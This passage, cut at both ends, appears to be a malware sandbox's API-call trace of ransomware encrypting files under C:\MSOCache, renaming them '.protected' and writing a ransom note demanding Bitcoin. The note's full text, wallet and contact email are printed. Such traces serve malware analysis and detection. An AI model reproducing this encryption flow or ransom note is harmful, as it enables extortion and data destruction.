users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0047.889] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0047.889] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0047.889] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x8f8, lpOverlapped=0x0) returned 1 [0048.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x8f8, lpOverlapped=0x0) returned 1 [0048.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.056] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.057] CloseHandle (hObject=0xb4) returned 1 [0048.058] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0048.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0048.058] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0048.059] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0048.059] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0048.059] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0048.059] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0048.059] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0048.060] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0048.060] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0048.060] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0048.060] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0048.060] CloseHandle (hObject=0xa4) returned 1 [0048.060] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0048.060] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0048.060] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 66 [0048.060] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0048.060] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0048.061] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 68 [0048.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0048.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0048.297] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0048.297] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0048.297] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0048.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.297] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0048.297] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0048.297] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.297] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.297] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.297] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0048.297] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0048.297] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0048.297] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0048.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0048.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.298] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0048.298] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0048.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.298] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Windows") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Program Files") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Program Files (x86)") returned -1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="$Recycle.bin") returned 1 [0048.298] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="System Volume Information") returned -1 [0048.298] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".protected") returned 0x0 [0048.298] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0048.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".txt") returned 0x0 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".rar") returned 0x0 [0048.298] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0048.298] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".zip") returned 0x0 [0048.298] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.468] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.468] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.477] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.478] CloseHandle (hObject=0xb4) returned 1 [0048.641] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.protected") returned 94 [0048.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.protected")) returned 1 [0048.642] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Windows") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Program Files") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Program Files (x86)") returned -1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="$Recycle.bin") returned 1 [0048.642] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="System Volume Information") returned -1 [0048.642] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".protected") returned 0x0 [0048.643] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0048.643] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.643] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.643] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".txt") returned 0x0 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".rar") returned 0x0 [0048.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0048.643] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".zip") returned 0x0 [0048.643] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0048.714] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0048.714] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.714] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.714] CloseHandle (hObject=0xb4) returned 1 [0048.715] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.protected") returned 94 [0048.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.protected")) returned 1 [0048.715] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0048.715] lstrcmpiW (lpString1="PptLR.cab", lpString2="Windows") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="Program Files") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="Program Files (x86)") returned -1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="$Recycle.bin") returned 1 [0048.716] lstrcmpiW (lpString1="PptLR.cab", lpString2="System Volume Information") returned -1 [0048.716] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.716] StrStrIW (lpFirst="PptLR.cab", lpSrch=".protected") returned 0x0 [0048.716] lstrcmpW (lpString1="PptLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0048.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0048.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0048.716] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".txt") returned 0x0 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".rar") returned 0x0 [0048.717] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0048.717] StrStrW (lpFirst="PptLR.cab", lpSrch=".zip") returned 0x0 [0048.717] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.747] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.747] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0048.748] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.748] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0048.776] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0048.776] CloseHandle (hObject=0xb4) returned 1 [0049.308] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.protected") returned 86 [0049.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.protected")) returned 1 [0049.310] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0049.310] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0049.310] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0049.310] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0049.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.310] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 